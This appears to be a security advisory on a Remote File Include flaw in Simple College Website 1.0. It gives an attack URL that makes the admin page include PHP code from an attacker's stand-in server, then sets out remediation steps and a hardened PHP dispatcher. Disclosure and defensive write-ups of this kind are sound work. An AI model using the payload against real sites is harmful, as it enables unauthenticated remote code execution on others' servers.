Simple College Website 1.0 is vulnerable to a Remote File Include (RFI) attack. User input is passed into a file include command, so the web application can be tricked into including remote files containing malicious code. An attacker can execute commands without authenticating to the system.
Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html
Source Code: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-college-website.zip
Root Cause Analysis and Hacking
Let’s look at the source code which caused the RFI.
Line 72 uses the `include` expression to include a PHP file. It is clear that there is no input validation or sanitisation on the value being included. Hence, we can include remote PHP files and execute them on the target.
Payload:
http://<target>/college_website/admin/index.php?page=http://<our_server>/exploit
Condition:
- To allow inclusion of remote files, the directive allow_url_include must be set to On in php.ini.
We can start a simple Python HTTP server locally and serve the remote PHP file from it for exploitation.
No authentication is needed to reach the vulnerable include and execute remote code. Hence, it is an unauthenticated RFI.
Remediation
- Authentication of requests made by the user.
- Checking the file location before including it.
- Disabling allow_url_include in php.ini.
- Input sanitisation and validation.
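The following is an added remediation example for the admin dispatcher, not the project's own code. It applies all four points above to the `page` parameter: the pages directory, the allowlist entries and the `$_SESSION['admin_id']` key are assumptions chosen for illustration.

```php
<?php
// Added remediation example for the admin dispatcher; it is not the project's
// own code. The page directory, the allowlist entries and the $_SESSION key
// 'admin_id' are assumptions, not taken from Simple College Website.
session_start();

// Vulnerable shape (reconstructed for illustration, not the original line 72):
//   include $_GET['page'];
// With allow_url_include=On, `page` may be a URL and the fetched file executes.

// Defence in depth: refuse to serve the page at all if remote includes are on.
// allow_url_include is PHP_INI_SYSTEM, so it cannot be turned off from here.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('allow_url_include must be Off in php.ini');
}

// Authentication: the admin area must not be reachable without a login.
if (empty($_SESSION['admin_id'])) {
    http_response_code(403);
    exit('Login required');
}

const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'courses', 'students', 'settings'];

// Map the `page` parameter to a file inside PAGE_DIR, or return null.
function resolve_page(string $requested): ?string
{
    // Exact allowlist match: URLs, "../" and php:// wrappers never get here.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // Resolve the real path and confirm it stays inside the pages directory,
    // so even a bad allowlist entry cannot reach outside PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}
$target = resolve_page($_GET['page'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```

With this shape the request parameter is never used as a path or URL directly; it only selects a name from a fixed list, and the remote-include directive is checked at runtime because it cannot be changed from script code.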